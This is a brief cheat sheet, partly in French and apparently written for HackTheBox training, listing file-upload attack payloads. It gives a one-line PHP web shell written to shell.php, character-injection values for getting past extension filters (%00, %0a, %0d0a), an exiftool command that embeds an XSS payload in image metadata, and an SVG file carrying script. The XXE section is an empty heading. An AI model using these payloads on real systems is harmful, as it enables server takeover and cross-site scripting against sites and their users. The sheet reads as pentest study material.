File upload

echo '<?php system($_REQUEST['cmd']); ?>' > shell.php

Injection de caractères

%20
%0a
%00
%0d0a
/
.\
.

:

XSS

exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>

XXE

Mis à jour